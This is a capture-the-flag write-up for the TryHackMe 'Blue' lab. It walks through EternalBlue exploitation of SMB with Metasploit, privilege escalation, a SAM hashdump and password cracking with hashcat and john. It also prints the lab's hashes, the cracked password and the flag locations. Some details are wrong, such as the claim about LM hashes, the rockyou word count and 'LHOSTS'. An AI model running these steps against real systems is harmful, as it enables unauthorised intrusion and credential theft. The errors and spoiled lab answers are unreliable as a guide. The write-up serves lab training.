tryhackme Blue writeup

tryhackme.com Blue writeup



connect to the tryhackme servers using their vpn 
    sudo apt install openvpn


download the vpn config file https://tryhackme.com/access
    sudo openvpn [config file]


once connected ping your target machine which you spun up in Task 1


in my case it is 10.10.154.72
    nmap -sV -p 0-1000 10.10.154.72


you find that there are 3 ports open under 1000 -- 135, 139, and 445
for the sake of brevity, SMB port 445 is what is vulnerable here and to find a specific exploit for the version running you can look up nmap scripts with this command
    ls -al /usr/share/nmap/scripts | grep -e "smb-"


go through each to find which one works or cheat:
    sudo nmap -p 445 10.10.154.72 --script smb-vuln-ms17-010.nse
you find that it is indeed vulnerable to Eternal Blue exploit


now you will use metasploit to exploit the target
    msfconsole
search for eternalblue
    search eternalblue
select the exploit for use
    use exploit/windows/smb/ms17_010_eternalblue 
it will automatically default your payload, what is sent to the target after a successful exploitation, to a reverse shell with meterpreter
set the remote host as your target
    set RHOSTS 10.10.154.72
set your host as local host
    set LHOSTS 10.10.213.131
you can check the options
    options
exploit or run
    exploit


you will be greeted with a meterpreter shell once successful


you can skip this if you indeed have a meterpreter shell running. This is only if you have a regular shell and need to upgrade to a meterpreter shell:


ctrl-z to background session


search for another module to upgrade your session
expl
    search shell_to_meterpreter
    use /post/multi/manage/shell_to_meterpreter 


list your sessions
    sessions
set the session to run on
    set SESSION 1
    run 
get back to meterpreter shell
    sessions 1


_______________________________________________________


https://docs.rapid7.com/metasploit/meterpreter-getsystem/
run this getsystem command to elevate permissions from admin to SYSTEM
    getsystem
then look up your id
    getuid
and you will see that you are AUTHORITY\SYSTEM
you can spawn a regular cmd shell if you'd like
    shell
    whoami
and go back to the meterpreter shell by
    ctrl-z


now, once back in the meterpreter shell, list out all the processes running on the machine
    ps
pick any where the user is NT AUTHORITY\SYSTEM
now you will inject meterpreter into that running process
you can read more about it here https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter
I inject into svchost.exe
    migrate 2146


next you dump the contents of the windows SAM, Security Accounts Manager, database. read more: https://www.sciencedirect.com/topics/computer-science/security-accounts-manager-database
    hashdump


three users with passwords hashed likeso


Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


copy these and paste them into a txt file. Each user has a RID, LM Hash, and NT hash. LM hash is old tech and Windows relies on LM hashes now. So you can delete everything except the username nad NT hash.


Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
Jon:ffb43f0de35be4d9917ac0cc8ad57f8d


open a new terminal and cd into the directory where you saved the hashes into a txt file
    cd Desktop/


you can either use johntheripper or hashcat to crack those NT hashes. Kali and other distros come preloaded with wordlists for bruteforcing in the /usr/share/wordlists/ directory. In most labs, rockyou.txt is good enough as it has around 80,000 words to go through. 
--username option skips over the username, -a 0 option sets attack mode to 0, -m 1000 option sets the hashtype, and hashes.txt is your saved hash txt file
    hashcat --username -a 0 -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt


you will crack the hash for Jon and it will be the password alqfna22


open a cmd shell to find the flags for the final part of the lab
    shell
    
search using the dir command -- *flag*.txt is the filename and /s is the option to list every occurrence of the specified file name within the specified directory and all subdirectories. Since we are starting at root C:\ this will scan entire drive. Keep in mind that this would take much longer on an actual target machine with hundreds of thousands of files.
    dir *flag*.txt /s


it finds flag1.txt in C:\
    type flag1.txt


it finds flag2.txt in C:\Windows\System32\config
    cd C:\Windows\System32\config\
    type flag2.txt


it finds flag3.txt in C:\Users\Jon\My Documents
    cd C:\Users\Jon\"My Documents"\
    type flag3.txt



Other notes:
if you want to use johntheripper to crack the hashes instead, first delete the username and colon from each line in the hashes.txt file. then run this command
    john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
display the results with
    john --format=NT --show hashes.txt
and you will see that it also cracked Jon's password to alqfna22